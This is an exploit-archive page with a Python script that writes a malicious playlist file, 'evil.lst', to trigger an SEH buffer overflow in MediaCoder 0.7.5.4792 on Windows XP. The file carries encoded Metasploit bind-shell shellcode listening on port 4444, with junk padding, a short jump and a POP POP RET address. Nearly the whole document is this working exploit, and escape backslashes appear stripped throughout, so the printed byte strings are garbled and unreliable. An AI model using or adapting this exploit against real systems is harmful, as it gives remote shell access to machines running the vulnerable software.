Mediacoder 0.7.5.4792 Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mediacoder 0.7.5.4792 Buffer Overflow Exploit (SEH)
# Published : 2010-11-29
# Author : 0v3r
# Previous Title : Windows Task Scheduler Privilege Escalation 0day
# Next Title : OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)
# Exploit Title: Mediacoder 0.7.5.4792 SEH Buffer Overflow Exploit
# Date: 11/29/2010
# Author: 0v3r
# Software Link: http://www.mediacoderhq.com/mirrors.htm?file=MediaCoder-0.7.5.4792.exe
# Version: 0.7.5.4792
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode = ("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x37x49x49x49x49x49x49x49x49x51x5ax6ax43"
"x58x30x41x31x50x41x42x6bx41x41x53x32x41x42x41x32"
"x42x41x30x42x41x58x50x38x41x42x75x4ax49x79x6cx62"
"x4ax48x6bx70x4dx38x68x6cx39x4bx4fx79x6fx6bx4fx73"
"x50x4cx4bx72x4cx46x44x57x54x4ex6bx31x55x67x4cx4e"
"x6bx63x4cx34x45x62x58x46x61x48x6fx4ex6bx50x4fx44"
"x58x6cx4bx51x4fx45x70x44x41x6ax4bx70x49x6ex6bx35"
"x64x4cx4bx53x31x78x6ex75x61x6bx70x4fx69x6ex4cx4b"
"x34x4fx30x53x44x57x77x6fx31x4bx7ax74x4dx75x51x69"
"x52x68x6bx48x74x57x4bx70x54x64x64x47x58x50x75x6d"
"x35x4cx4bx31x4fx36x44x56x61x78x6bx63x56x6cx4bx54"
"x4cx70x4bx4ex6bx53x6fx75x4cx47x71x5ax4bx63x33x54"
"x6cx4ex6bx6bx39x30x6cx44x64x35x4cx71x71x5ax63x34"
"x71x6bx6bx72x44x6cx4bx37x33x76x50x4ex6bx71x50x56"
"x6cx6cx4bx44x30x65x4cx4cx6dx4cx4bx77x30x35x58x61"
"x4ex62x48x6cx4ex62x6ex44x4ex38x6cx50x50x4bx4fx5a"
"x76x45x36x70x53x41x76x32x48x70x33x56x52x45x38x42"
"x57x72x53x34x72x63x6fx72x74x6bx4fx78x50x72x48x38"
"x4bx58x6dx6bx4cx65x6bx42x70x49x6fx69x46x71x4fx6c"
"x49x6ax45x65x36x4fx71x4ax4dx35x58x53x32x50x55x32"
"x4ax35x52x49x6fx48x50x31x78x7ax79x36x69x4cx35x6c"
"x6dx70x57x39x6fx6ex36x70x53x32x73x62x73x56x33x52"
"x73x73x73x52x73x33x73x30x53x6bx4fx4ax70x35x36x75"
"x38x52x31x41x4cx61x76x50x53x4dx59x4dx31x4dx45x55"
"x38x69x34x56x7ax42x50x5ax67x36x37x79x6fx7ax76x61"
"x7ax76x70x66x31x73x65x39x6fx68x50x41x78x4dx74x4e"
"x4dx76x4ex68x69x42x77x79x6fx59x46x36x33x66x35x69"
"x6fx6ex30x45x38x4bx55x51x59x6fx76x72x69x42x77x6b"
"x4fx4ax76x70x50x46x34x36x34x53x65x79x6fx6ex30x6c"
"x53x65x38x4bx57x70x79x5ax66x52x59x30x57x69x6fx6a"
"x76x30x55x59x6fx6ex30x70x66x70x6ax53x54x72x46x62"
"x48x65x33x50x6dx6cx49x4dx35x31x7ax52x70x70x59x44"
"x69x7ax6cx4cx49x69x77x51x7ax71x54x4fx79x4bx52x34"
"x71x39x50x4cx33x4dx7ax6bx4ex71x52x44x6dx6bx4ex37"
"x32x54x6cx4ex73x4ex6dx33x4ax56x58x6cx6bx6cx6bx6e"
"x4bx53x58x64x32x69x6ex6cx73x44x56x6bx4fx73x45x47"
"x34x4bx4fx79x46x33x6bx42x77x73x62x30x51x73x61x72"
"x71x62x4ax33x31x42x71x50x51x72x75x50x51x49x6fx78"
"x50x71x78x4ex4dx39x49x75x55x6ax6ex70x53x4bx4fx59"
"x46x32x4ax4bx4fx49x6fx56x57x69x6fx5ax70x4ex6bx33"
"x67x49x6cx6dx53x39x54x55x34x39x6fx4bx66x31x42x69"
"x6fx4ax70x62x48x78x70x4dx5ax35x54x63x6fx70x53x39"
"x6fx4ex36x39x6fx38x50x43")


junk = "x41" * 764
nseh = "xebx06x90x90"  # short jump  
seh  = "xeex04x01x66"  # POP POP RET libiconv-2.dll 
nops = 16 * "x90"
more = "x42" * (10000 - len(junk + nseh + seh + nops + shellcode))

buff = junk + nseh + seh + nops + shellcode  + more

print "n"	
print "---------------------------------------------------------------------------------"
print "|             Mediacoder 0.7.5.4792 SEH Buffer Overflow Exploit                 |"
print "---------------------------------------------------------------------------------"
print "n"

try:
 	f = open("evil.lst",'w')
	f.write(buff)
	f.close()
	print " Vulnerable file created!...n" 
except:
	print "[-] Error occured!"